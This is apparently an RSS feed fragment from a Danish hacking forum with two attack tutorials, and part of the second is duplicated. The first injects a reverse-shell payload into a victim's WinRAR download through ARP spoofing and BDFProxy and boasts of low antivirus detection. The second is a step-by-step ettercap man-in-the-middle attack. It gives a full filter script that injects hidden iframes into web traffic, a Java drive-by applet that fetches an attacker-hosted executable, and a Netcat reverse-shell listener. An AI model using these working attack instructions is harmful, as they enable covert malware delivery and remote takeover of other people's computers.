<blockquote class="mycode_quote"><cite>Citer:</cite>arpspoof –i wlan0 –t 192.168.0.102 192.168.0.1</blockquote>
<span style="font-weight: bold;" class="mycode_b">-i &lt;Interface&gt;</span> <span style="font-style: italic;" class="mycode_i">wlan0</span> - Det interface vores netværkskort er registreret på. Kan findes ved at bruge <span style="font-weight: bold;" class="mycode_b">'ifconfig'</span>.<br />
<span style="font-weight: bold;" class="mycode_b">-t &lt;Target&gt;</span> <span style="font-style: italic;" class="mycode_i">192.168.0.102</span> - Da dette er en demonstration bruger jeg kun en enkelt IP der skal arp spoofes, <span style="text-decoration: underline;" class="mycode_u">uden –t valgmuligheden vil alle IP’er på netværket få tildelt vores <span style="font-weight: bold;" class="mycode_b">ARP pakker</span>.</span><br />
<span style="font-weight: bold;" class="mycode_b">&lt;Host&gt;</span> <span style="font-style: italic;" class="mycode_i">192.168.0.1</span> – Den vært hvis pakker vi vil opsnappe. Her er det vores <span style="font-weight: bold;" class="mycode_b">router</span>, da den står for pakkeomdelingen.<br />
<img src="http://anony.ws/i/2014/08/25/Screenshotfrom2014-08-2421_54_31.png" alt="[Billede: Screenshotfrom2014-08-2421_54_31.png]" class="mycode_img" /> <br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 8</span></span><br />
Nu starter vi vores <span style="font-weight: bold;" class="mycode_b">listener</span>, så alle indgående forbindelser bliver accepteret af vores computer. Igen vil jeg bruge <span style="font-weight: bold;" class="mycode_b">Netcat</span>, og igen kan andre listeners/handlers bruges.<br />
[/i](Jeg ved mit ofres computer er Windows x64, så jeg ’lytter’ på den port der passer hertil fra bdfproxy.cfg. Hvis dette angreb var tiltænkt hele netværket, ville jeg selvfølgelig ’lytte’ på alle de gældende porte)[/i]<br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-2422_50_26.png" alt="[Billede: Screenshotfrom2014-08-2422_50_26.png]" class="mycode_img" /><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 9</span></span><br />
Når vores offer downloader en executable, vil denne blive injiceret med vores <span style="font-weight: bold;" class="mycode_b">shell code</span>, og derfter leveret til offeret ved hjælp af <span style="font-weight: bold;" class="mycode_b">BDFProxy</span>.<br />
Vil i dette eksempel downloade <span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">Winrar x64</span></span> over netværket på <span style="font-weight: bold;" class="mycode_b">’offerets’</span> computer.<br />
Når <span style="font-weight: bold;" class="mycode_b">BDFProxy</span> opdager en fil der er ved at blive downloadet, vil det se således ud:<br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-2423_03_27.png" alt="[Billede: Screenshotfrom2014-08-2423_03_27.png]" class="mycode_img" /><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">Og når vores kære offer så åbner filen, vil vores payload blive eksekveret samtidig med installationsfilen.</span></span><br />
<br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Offerets PC – Winrar installationsfil:</span></span><br />
<img src="http://anony.ws/i/2014/08/24/rar.png" alt="[Billede: rar.png]" class="mycode_img" /><br />
<br />
<br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Netcat – Shell på offeret PC:</span></span><br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-2423_04_18.png" alt="[Billede: Screenshotfrom2014-08-2423_04_18.png]" class="mycode_img" /><br />
<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">BONUS</span></span><br />
Vil fraråde Alle at skanne igennem Virustotal - I ved jo hvorfor - Men ville lige vise jer, hvad Reverse_TCP + Winrar gør for detections:<br />
<br />
<a href="https://www.virustotal.com/en/file/ef6484a77db0dc031101509d8a08aa35176c91b4076a4818df631e5025d00853/analysis/1408917202/" target="_blank" rel="noopener" class="mycode_url">https://www.virustotal.com/en/file/ef648...408917202/</a><br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>SHA256: 	ef6484a77db0dc031101509d8a08aa35176c91b4076a4818df631e5025d00853<br />
File name: 	winrar-x64-511b1.exe<br />
Detection ratio: 	2 / 54<br />
Analysis date: 	2014-08-24 21:53:22 UTC ( 1 minute ago ) </blockquote>
<br />
<span style="font-weight: bold;" class="mycode_b">Det er pænt lækkert, hva?</span><br />
<br />
<span style="text-decoration: underline;" class="mycode_u">Dette kan også opnåes ved hjælp af BDF - Backdoor.py.</span>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[HTML Injektion over Netværket]]></title>
			<link>https://www.shellsec.pw/traad-html-injektion-over-netvaerket</link>
			<pubDate>Sun, 24 Aug 2014 20:32:56 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-html-injektion-over-netvaerket</guid>
			<description><![CDATA[<span style="font-size: xx-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Introduktion</span></span><br />
I denne tutorial vil vi tage et kig på en af de mange ting vi kan opnå på et netværk ved hjælp af Ettercap. De fleste har nok prøvet at sniffe HTTP brugernavne og kodeord, og sikkert også leget med SSLStrip dengang det rent faktisk var brugbart. Så lad os grave lidt dybere denne gang, og se hvad vi kan få ud af at lege lidt med filtre i Ettercap. For at sige det simpelt, vil vi omdirigere netværktrafikken til vores egen PC, udskifte diverse HTML tags med iFrames, køre en server der kan hoste vores drive-by, generere en payload med msfpayload, lade vores drive-by levere vores payload. Bemærk at vi udelukkende kommer til at ændre i HTTP trafik. Synes ikke det er besværet værd at skulle til at implementere hverken SSLStrip eller BREACH. Det skader mere end det gavner.<br />
<br />
- Er ikke så kreativ når det kommer til tekst-baserede tutorials, men har kigget lidt her så ShellSec for at få en idé om hvordan i andre gør.<br />
- Synes disse enkle trin var alt for nemme til at en video var nødvendig - det tager trods alt kun få minutter. MEN - kan være der kommer en senere.<br />
- Overvejede at lave flere undersektioner med opsætning af Metasploit, BeEF og Javascript Keylogger + Form Grabber. Men det er jo noget af det letteste - kender og ikke rigtig folk og deres niveau endnu. <br />
- Vær opmærksom på, at jeg kører som <span style="text-decoration: underline;" class="mycode_u">root</span>. Hvis du bare er normal bruger, kan du blive nødt til at køre <span style="font-weight: bold;" class="mycode_b">SU</span> - eller <span style="font-weight: bold;" class="mycode_b">SUDO</span> hvis du er i <span style="text-decoration: underline;" class="mycode_u">sudoers-filen</span>.<br />
- Så skulle det vidst passe med 10 billeder.<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Krav</span></span><br />
<span style="font-weight: bold;" class="mycode_b">Kali</span> – eller hvilken som helst linux variant du foretrækker | Auditor? :P<br />
<span style="font-weight: bold;" class="mycode_b">Ettercap</span> ~ <span style="font-weight: bold;" class="mycode_b">Etterfilter</span><br />
<span style="font-weight: bold;" class="mycode_b">Apache</span> server – Behøves heller ikke – mere om det senere<br />
<span style="font-weight: bold;" class="mycode_b">Metasploit</span> ~ <span style="font-weight: bold;" class="mycode_b">MSFPayload</span><br />
<span style="font-weight: bold;" class="mycode_b">Netcat</span> – eller Metasploit’s handler<br />
Lidt kendskab til Kali eller Linux generelt (Hvis du nu støder ind i problemer) <br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 1</span></span><br />
Til at starte med vil vi generere en reverse_tcp payload, da calc.exe måske er bedre til en demonstation, er det stadig lidt fesent.<br />
Til det bruger vi selvfølgelig MSFPayload (Ingen grund til at gøre det mere kompliceret ved selv at kompilere skidtet).<br />
Jeg er også stor fan af meterpreter payloads. Hvis man så SENERE vil have lidt bredere funktionalitet igennem en rat, kan man jo enten selv skrive plugins til meterpreter eller bare køre ratten direkte på vores offers PC. <br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-1916_53_44.png" alt="[Billede: Screenshotfrom2014-08-1916_53_44.png]" class="mycode_img" /><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 2</span></span> <br />
Når vi har genereret vores payload, eller opsat en anden RAT alt efter hvad vi foretrækker, er det tid til at aktivere IP Forwarding, så vi kan få pakkerne omdirigeret:<br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>echo 1 &gt; /proc/sys/net/ipv4/ip_forward</code></div></div><br />
Det er her en god idé at tjekke om vores ændring nu også er vedtaget. Til det bruger vi selvfølgelig cat, så vi læse filens beskedne indhold direkte i terminalen <br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>cat /proc/sys/net/ipv4/ip_forward</code></div></div><img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-1900_58_52.png" alt="[Billede: Screenshotfrom2014-08-1900_58_52.png]" class="mycode_img" /><br />
<br />
 <br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 3</span></span><br />
For at ettercap kan være i stand til at udskifte HTML i den trafik der kører igennem vores PC, vil vi bruge et filter. Dette filter vil udskifte de HTML tags som vi specificerer. Filetret vil desuden sørge for ikke at ændre i data fra vores egen IP.<br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>if (ip.proto == TCP &amp;&amp; ip.dst != "VORES.IP") {  <br />
   if (search(DATA.data, "gzip")) {    <br />
  replace("gzip", "    ");    <br />
  msg("[*] Zapped 'gzip'\n");  <br />
   }<br />
   if (search(DATA.data, "deflate")) {<br />
  replace("deflate", "  ");<br />
  msg("[*] Zapped 'deflate'\n");<br />
   }<br />
   if (search(DATA.data, "gzip,deflate")) {<br />
  replace("gzip,deflate", "    ");<br />
  msg("[*] Zapped 'gzip,deflate'\n");<br />
   }<br />
   if (search(DATA.data, "Accept-Encoding")) {<br />
  replace("Accept-Encoding", "Accept-Rubbish!");<br />
  msg("[*] Zapped 'Accept-Encoding'\n");<br />
   }<br />
<br />
   if (search(DATA.data, "&lt;/title&gt;")){    <br />
  replace("&lt;/title&gt;","&lt;/title&gt;&lt;iframe src=\"http://SERVER.IP\" width=\"0\" height=\"0\" frameBorder=\"0\"&gt;&lt;/iframe&gt;");  <br />
  msg("[&gt;] Injecting into (&lt;/title&gt;)\n");  <br />
   }<br />
   if (search(DATA.data, "&lt;/TITLE&gt;")){<br />
  replace("&lt;/TITLE&gt;","&lt;/TITLE&gt;&lt;iframe src=\"http://SERVER.IP\" width=\"0\" height=\"0\" frameBorder=\"0\"&gt;&lt;/iframe&gt;");<br />
  msg("[&gt;] Injecting into (&lt;/TITLE&gt;)\n");<br />
   }<br />
   if (search(DATA.data, "body&gt;")){<br />
  replace("body&gt;","body&gt;&lt;iframe src=\"http://SERVER.IP\" width=\"0\" height=\"0\" frameBorder=\"0\"&gt;&lt;/iframe&gt;");<br />
  msg("[&gt;] Injecting into (body&gt;)\n");<br />
   }<br />
   if (search(DATA.data, "BODY&gt;")){<br />
  replace("BODY&gt;","BODY&gt;&lt;iframe src=\"http://SERVER.IP\" width=\"0\" height=\"0\" frameBorder=\"0\"&gt;&lt;/iframe&gt;");<br />
  msg("[&gt;] Injecting into (BODY&gt;)\n");<br />
   }<br />
<br />
   if (search(DATA.data, "http://VORES.IP")){    <br />
  msg("[+] Injected correctly!\n");    <br />
   }<br />
}</blockquote>
<br />
<br />
<br />
<span style="font-style: italic;" class="mycode_i">Her ville det være en god idé at lave flere varianter af filteret. Alle de beskeder vi får fra ettercap kan godt blive uoverskueligt, så lav lidt filtre der Kun udskifter f. eks. Title eller Body tags. Desuden kan du fjerne flere af ’msg’ funktionerne, da vi kun er interesserede i, om vores filter nu også virker efter hensigten.</span><br />
<br />
<br />
På <span style="font-style: italic;" class="mycode_i">øverste</span> <span style="font-weight: bold;" class="mycode_b">OG</span> <span style="font-style: italic;" class="mycode_i">fjerde-nederste linie</span> står der skrevet <span style="font-weight: bold;" class="mycode_b">‘VORES.IP’</span>. Dette skal være <span style="font-weight: bold;" class="mycode_b">vores egen IP</span>, og Ettercap bruger denne til at tjekke for fuldendt injicering.<br />
<span style="font-weight: bold;" class="mycode_b">Routeren</span> har givet os en <span style="font-weight: bold;" class="mycode_b">lokal IP</span>, så den kan finde og udlevere data til og fra os. Det er denne IP, vi skal bruge øverst. For at finde from til denne, kan vi bruge ifconfig <span style="font-style: italic;" class="mycode_i">(Hvor vi fra Windows kender ipconfig)</span><br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-1901_03_03.png" alt="[Billede: Screenshotfrom2014-08-1901_03_03.png]" class="mycode_img" /><br />
<br />
<span style="font-style: italic;" class="mycode_i">(Bemærk at jeg bruger wlan0 da jeg ved dette er interfacet mit trådløse netværkskort er registreret på. Hvad vi skal bruge her er vores inet adresse. Den eneste grund til jeg bruger grep, er for at mindske resultatet og gøre det lidt mere overskueligt)</span><br />
<br />
Desuden ser vi <span style="font-weight: bold;" class="mycode_b">4 andre steder i filteret</span> hvor der står <span style="font-weight: bold;" class="mycode_b">'SERVER.IP'</span>. Disse er placeret inde i <span style="font-weight: bold;" class="mycode_b">iFrame tags</span>, og skal pege på den <span style="font-weight: bold;" class="mycode_b">IP eller DOMÆNE</span> hvor vi kører vores <span style="font-weight: bold;" class="mycode_b">’ondsindet’ kode</span>. Dette kan være alt lige fra <span style="text-decoration: underline;" class="mycode_u">Javascript keylogger/form grabber, IP logger, BeEF, Metasploit autopwn. Man kan jo også lave sit eget lille exploit kit med nogle af følgende: Internet Explorer exploit, Java exploit med Java applet drive-by som fallback, Adobe Flash exploit med falsk opdatering som fallback, AddJavascriptInterface exploit til Android + APK download som fallback osv.</span><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 4</span></span><br />
I dette eksempel vil jeg nøjes med følgende java drive-by:<br />
<a href="https://mega.co.nz/#F!P49QHbKa!BvW2MEo_mIhpPTeKoy3kDw" target="_blank" rel="noopener" class="mycode_url">https://mega.co.nz/#F!P49QHbKa!BvW2MEo_mIhpPTeKoy3kDw</a><br />
Det er et meget simpelt drive-by der kun kræver disse 3 filer:<br />
<span style="font-weight: bold;" class="mycode_b">Index.html<br />
drive.jar<br />
pload.exe</span> <span style="font-style: italic;" class="mycode_i">(Den fil vi ønsker at køre på vores ”ofres” computere)</span><br />
Nu gældet det så bare om at kopiere filerne til den mappe vi kører vores server fra.<br />
Index.html ser således ud:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>&lt;applet code="__JAVA__.class" archive="drive.jar" width="0" height="0"&gt;<br />
&lt;param name="filename" value="pload.exe"&gt;<br />
&lt;param name="urserver" value="http://192.168.0.101/pload.exe"&gt;<br />
&lt;/applet&gt;<br />
&lt;/body&gt;<br />
&lt;/html&gt;</blockquote>
Parametrene er opsat på denne måde:<br />
<span style="font-weight: bold;" class="mycode_b">archive</span> skal pege på vores kompilerede .jar java fil.<br />
<span style="font-weight: bold;" class="mycode_b">filename</span> angiver hvad filen skal hedde efter den er hentet ned på ofrets computer.<br />
<span style="font-weight: bold;" class="mycode_b">urserver</span> peger på serveren og filnavnet på den fil vi vil lade vores drive-by applet køre. I dette tilfælde er det vores reverse_tcp payload. <br />
<br />
Har bare valgt at bruge <span style="font-weight: bold;" class="mycode_b">Apache</span> og den tilhørende mappe <span style="font-weight: bold;" class="mycode_b">/var/www</span><br />
Bare træk filerne over i mappen eller brug <span style="text-decoration: underline;" class="mycode_u">cp</span> hvis du vil være awesome.<br />
<br />
Nu kan vi så starte Apache. Det kan du gøre fra <span style="font-weight: bold;" class="mycode_b">'Applications'</span> menuen, køre <span style="font-weight: bold;" class="mycode_b">'apache2ctl'</span> eller bare bruge <span style="font-weight: bold;" class="mycode_b">'init.d'</span> som i dette eksempel - <span style="text-decoration: underline;" class="mycode_u">Det er igen en smagssag</span>.<br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-1900_59_56.png" alt="[Billede: Screenshotfrom2014-08-1900_59_56.png]" class="mycode_img" /> <br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 5</span></span><br />
Når din server kører og er klar til at levere vores exploit kan vi gå videre til at <span style="font-weight: bold;" class="mycode_b">kompilere</span> vores <span style="font-weight: bold;" class="mycode_b">Ettercap filter</span>. Desværre er <span style="font-weight: bold;" class="mycode_b">Ettercap</span> ikke lavet sådan at vi kan scripte uden at kompilere, men heldigvis tager det ikke mere end 5 sekunder.<br />
<br />
Vi vil her bruge <span style="font-weight: bold;" class="mycode_b">Etterfilter</span>. <span style="font-weight: bold;" class="mycode_b">Etterfilter</span> er en del af <span style="font-weight: bold;" class="mycode_b">Ettercap</span>, og kræver at vi specificerer en <span style="text-decoration: underline;" class="mycode_u">input-fil[u] <span style="font-style: italic;" class="mycode_i">(filteret der skal kompileres)</span> og en [u]output-fil</span> <span style="font-style: italic;" class="mycode_i">(filteret Efter kompilering)</span>. I dette eksempel er mit filter placeret i <span style="font-weight: bold;" class="mycode_b">/root/</span> mappen - samme mappe som konsollen arbejder i uden at du selv har angivet andet. Så hvis dit filter er gemt i en anden mappe, eller hvis du har ændret konsollens arbejdsmappe til noget andet, så sørg for at tilføje filstien når du kører etterfilter. Du kan faktisk bare trække filen ind i konsollen, og så får du den fulde sti. <br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-1901_03_48.png" alt="[Billede: Screenshotfrom2014-08-1901_03_48.png]" class="mycode_img" /><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 6</span></span><br />
Nu kan vi så køre Ettercap med følgende parametre:<br />
<span style="font-weight: bold;" class="mycode_b">-T &lt;Text mode&gt;</span> – Det ville ikke give mening at køre GUI mode her, så vi kører i text mode i konsollen<br />
<span style="font-weight: bold;" class="mycode_b">–i &lt;Interface&gt;</span> - Samme interface som vi fandt  tidligere – altså vores netværkskort)<br />
<span style="font-weight: bold;" class="mycode_b">–q &lt;Quite mode&gt;</span> - Så vi ikke bliver overvældet af pakkedata, men kun får brugbare informationer såsom forbundne enheder og filter data<br />
<span style="font-weight: bold;" class="mycode_b">–F &lt;Filter&gt;</span> - Filteret vi kompilerede før<br />
<span style="font-weight: bold;" class="mycode_b">–M &lt;MiTM&gt;</span> - Man-in-The-Middle angreb. Desuden burger vi ARP til at specificere at vores angreb skal forgifte vores ofres ARP-caches, så deres pakker bliver sendt videre til Vores PC hvor vi kan ændre dem on-the-fly<br />
<span style="font-weight: bold;" class="mycode_b"> // // &lt;Target 1 + Target 2&gt;</span> - Her vælger vi targets. I dette eksempel er ALLE IP’er targets, men du kan også vælge en enkelt IP (192.168.0.105)  eller en række (192.168.0.105-110) som ’Target 1’ efterfulgt af routerens IP som ’Target 2’ (192.168.0.1)<br />
<span style="font-weight: bold;" class="mycode_b">-P &lt;Plugin&gt;</span> - Her kan vi vælge hvilke plugins ettercap skal loade og køre under vores angreb. Der er mange spændende muligheder, men har kun valg at bruge ’autoadd’, der automatisk tilføjer nye Targets efterhånden som ettercap opdager dem.<br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-1901_05_34.png" alt="[Billede: Screenshotfrom2014-08-1901_05_34.png]" class="mycode_img" /><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 7</span></span><br />
Da vi har valgt at bruge vores <span style="font-weight: bold;" class="mycode_b">reverse_tcp payload</span> skal vi også have en <span style="font-weight: bold;" class="mycode_b">listnener</span> af en slags kørende klar til at modtage indgående forbindelser. Det kan være alle slags listeners, såfrem de er kompatible med vores payload. Har valgt at bruge <span style="font-weight: bold;" class="mycode_b">Netcat</span>, men du kan også bruge en af <span style="font-weight: bold;" class="mycode_b">Metasploit’s handlers</span>. <br />
<span style="font-weight: bold;" class="mycode_b">-l</span> - Fortæller Netcat at vi vil ’lytte’ efter <span style="font-weight: bold;" class="mycode_b">indgående forbindelser</span>, i stedet for selv at udføre en udgående forbindelse<br />
<span style="font-weight: bold;" class="mycode_b">-v</span> – Giver os simple beskeder om Netcats aktivitet<br />
<span style="font-weight: bold;" class="mycode_b">-p</span> – Porten Netcat skal ’lytte efter’<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>Nc –lvp 9191</blockquote>
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Done!</span></span><br />
Hvis vi besøger en tilfældig <span style="font-weight: bold;" class="mycode_b">HTTP</span> side nu, kan vi se i vores <span style="font-weight: bold;" class="mycode_b">Ettercap terminal</span>, at vores filter virker lige som det skal. Hvis du ikke har ændret i filteret før du kompilerede det, vil dit <span style="font-weight: bold;" class="mycode_b">output</span> se nogenlunde således ud:<br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-1916_51_09.png" alt="[Billede: Screenshotfrom2014-08-1916_51_09.png]" class="mycode_img" /> <br />
<br />
<br />
<br />
<img src="http://anony.ws/i/2014/08/24/v22.png" alt="[Billede: v22.png]" class="mycode_img" /><br />
<span style="font-style: italic;" class="mycode_i">(Kan se der står taipans - hvis jeg husker rigtigt er det Java Drive-by Applet' fra FinFisher Web. Testede deres applet da jeg skrev denne tutorial, så det skulle være den eneste grund til at der ikke står <span style="font-weight: bold;" class="mycode_b">_JAVA_</span>, hvilket der gør i det Drive-By jeg linkede til)</span> <br />
<span style="font-weight: bold;" class="mycode_b">Desuden bruger jeg Internet Explorer for at undgå de sikkerhedsforanstaltninger Firefox og Chrome bruger! - Nemlig Click-2-Play</span><br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: large;" class="mycode_size">Hvis vi vælger at køre dette <span style="font-weight: bold;" class="mycode_b">applet</span>, kan vi se at vores <span style="font-weight: bold;" class="mycode_b">payload</span> bliver kørt, og vi får med det samme en <span style="font-weight: bold;" class="mycode_b">reverse_tcp shell</span> ved hjælp af <span style="font-weight: bold;" class="mycode_b">Netcat</span>. </span><br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-1916_49_54.png" alt="[Billede: Screenshotfrom2014-08-1916_49_54.png]" class="mycode_img" /><br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: large;" class="mycode_size">Og lige for en god ordens skyld tjekker vi lige om det nu også er vores testmaskine vi har inficeret, og <span style="text-decoration: underline;" class="mycode_u"><span style="font-style: italic;" class="mycode_i">ikke</span> en tilfældig forbipasserende på netværket</span>:</span><br />
<img src="http://anony.ws/i/2014/08/24/success.png" alt="[Billede: success.png]" class="mycode_img" />]]></description>
			<content:encoded><![CDATA[<span style="font-size: xx-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Introduktion</span></span><br />
I denne tutorial vil vi tage et kig på en af de mange ting vi kan opnå på et netværk ved hjælp af Ettercap. De fleste har nok prøvet at sniffe HTTP brugernavne og kodeord, og sikkert også leget med SSLStrip dengang det rent faktisk var brugbart. Så lad os grave lidt dybere denne gang, og se hvad vi kan få ud af at lege lidt med filtre i Ettercap. For at sige det simpelt, vil vi omdirigere netværktrafikken til vores egen PC, udskifte diverse HTML tags med iFrames, køre en server der kan hoste vores drive-by, generere en payload med msfpayload, lade vores drive-by levere vores payload. Bemærk at vi udelukkende kommer til at ændre i HTTP trafik. Synes ikke det er besværet værd at skulle til at implementere hverken SSLStrip eller BREACH. Det skader mere end det gavner.<br />
<br />
- Er ikke så kreativ når det kommer til tekst-baserede tutorials, men har kigget lidt her så ShellSec for at få en idé om hvordan i andre gør.<br />
- Synes disse enkle trin var alt for nemme til at en video var nødvendig - det tager trods alt kun få minutter. MEN - kan være der kommer en senere.<br />
- Overvejede at lave flere undersektioner med opsætning af Metasploit, BeEF og Javascript Keylogger + Form Grabber. Men det er jo noget af det letteste - kender og ikke rigtig folk og deres niveau endnu. <br />
- Vær opmærksom på, at jeg kører som <span style="text-decoration: underline;" class="mycode_u">root</span>. Hvis du bare er normal bruger, kan du blive nødt til at køre <span style="font-weight: bold;" class="mycode_b">SU</span> - eller <span style="font-weight: bold;" class="mycode_b">SUDO</span> hvis du er i <span style="text-decoration: underline;" class="mycode_u">sudoers-filen</span>.<br />
- Så skulle det vidst passe med 10 billeder.<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Krav</span></span><br />
<span style="font-weight: bold;" class="mycode_b">Kali</span> – eller hvilken som helst linux variant du foretrækker | Auditor? :P<br />
<span style="font-weight: bold;" class="mycode_b">Ettercap</span> ~ <span style="font-weight: bold;" class="mycode_b">Etterfilter</span><br />
<span style="font-weight: bold;" class="mycode_b">Apache</span> server – Behøves heller ikke – mere om det senere<br />
<span style="font-weight: bold;" class="mycode_b">Metasploit</span> ~ <span style="font-weight: bold;" class="mycode_b">MSFPayload</span><br />
<span style="font-weight: bold;" class="mycode_b">Netcat</span> – eller Metasploit’s handler<br />
Lidt kendskab til Kali eller Linux generelt (Hvis du nu støder ind i problemer) <br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 1</span></span><br />
Til at starte med vil vi generere en reverse_tcp payload, da calc.exe måske er bedre til en demonstation, er det stadig lidt fesent.<br />
Til det bruger vi selvfølgelig MSFPayload (Ingen grund til at gøre det mere kompliceret ved selv at kompilere skidtet).<br />
Jeg er også stor fan af meterpreter payloads. Hvis man så SENERE vil have lidt bredere funktionalitet igennem en rat, kan man jo enten selv skrive plugins til meterpreter eller bare køre ratten direkte på vores offers PC. <br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-1916_53_44.png" alt="[Billede: Screenshotfrom2014-08-1916_53_44.png]" class="mycode_img" /><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 2</span></span> <br />
Når vi har genereret vores payload, eller opsat en anden RAT alt efter hvad vi foretrækker, er det tid til at aktivere IP Forwarding, så vi kan få pakkerne omdirigeret:<br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>echo 1 &gt; /proc/sys/net/ipv4/ip_forward</code></div></div><br />
Det er her en god idé at tjekke om vores ændring nu også er vedtaget. Til det bruger vi selvfølgelig cat, så vi læse filens beskedne indhold direkte i terminalen <br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>cat /proc/sys/net/ipv4/ip_forward</code></div></div><img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-1900_58_52.png" alt="[Billede: Screenshotfrom2014-08-1900_58_52.png]" class="mycode_img" /><br />
<br />
 <br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 3</span></span><br />
For at ettercap kan være i stand til at udskifte HTML i den trafik der kører igennem vores PC, vil vi bruge et filter. Dette filter vil udskifte de HTML tags som vi specificerer. Filetret vil desuden sørge for ikke at ændre i data fra vores egen IP.<br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>if (ip.proto == TCP &amp;&amp; ip.dst != "VORES.IP") {  <br />
   if (search(DATA.data, "gzip")) {    <br />
  replace("gzip", "    ");    <br />
  msg("[*] Zapped 'gzip'\n");  <br />
   }<br />
   if (search(DATA.data, "deflate")) {<br />
  replace("deflate", "  ");<br />
  msg("[*] Zapped 'deflate'\n");<br />
   }<br />
   if (search(DATA.data, "gzip,deflate")) {<br />
  replace("gzip,deflate", "    ");<br />
  msg("[*] Zapped 'gzip,deflate'\n");<br />
   }<br />
   if (search(DATA.data, "Accept-Encoding")) {<br />
  replace("Accept-Encoding", "Accept-Rubbish!");<br />
  msg("[*] Zapped 'Accept-Encoding'\n");<br />
   }<br />
<br />
   if (search(DATA.data, "&lt;/title&gt;")){    <br />
  replace("&lt;/title&gt;","&lt;/title&gt;&lt;iframe src=\"http://SERVER.IP\" width=\"0\" height=\"0\" frameBorder=\"0\"&gt;&lt;/iframe&gt;");  <br />
  msg("[&gt;] Injecting into (&lt;/title&gt;)\n");  <br />
   }<br />
   if (search(DATA.data, "&lt;/TITLE&gt;")){<br />
  replace("&lt;/TITLE&gt;","&lt;/TITLE&gt;&lt;iframe src=\"http://SERVER.IP\" width=\"0\" height=\"0\" frameBorder=\"0\"&gt;&lt;/iframe&gt;");<br />
  msg("[&gt;] Injecting into (&lt;/TITLE&gt;)\n");<br />
   }<br />
   if (search(DATA.data, "body&gt;")){<br />
  replace("body&gt;","body&gt;&lt;iframe src=\"http://SERVER.IP\" width=\"0\" height=\"0\" frameBorder=\"0\"&gt;&lt;/iframe&gt;");<br />
  msg("[&gt;] Injecting into (body&gt;)\n");<br />
   }<br />
   if (search(DATA.data, "BODY&gt;")){<br />
  replace("BODY&gt;","BODY&gt;&lt;iframe src=\"http://SERVER.IP\" width=\"0\" height=\"0\" frameBorder=\"0\"&gt;&lt;/iframe&gt;");<br />
  msg("[&gt;] Injecting into (BODY&gt;)\n");<br />
   }<br />
<br />
   if (search(DATA.data, "http://VORES.IP")){    <br />
  msg("[+] Injected correctly!\n");    <br />
   }<br />
}</blockquote>
<br />
<br />
<br />
<span style="font-style: italic;" class="mycode_i">Her ville det være en god idé at lave flere varianter af filteret. Alle de beskeder vi får fra ettercap kan godt blive uoverskueligt, så lav lidt filtre der Kun udskifter f. eks. Title eller Body tags. Desuden kan du fjerne flere af ’msg’ funktionerne, da vi kun er interesserede i, om vores filter nu også virker efter hensigten.</span><br />
<br />
<br />
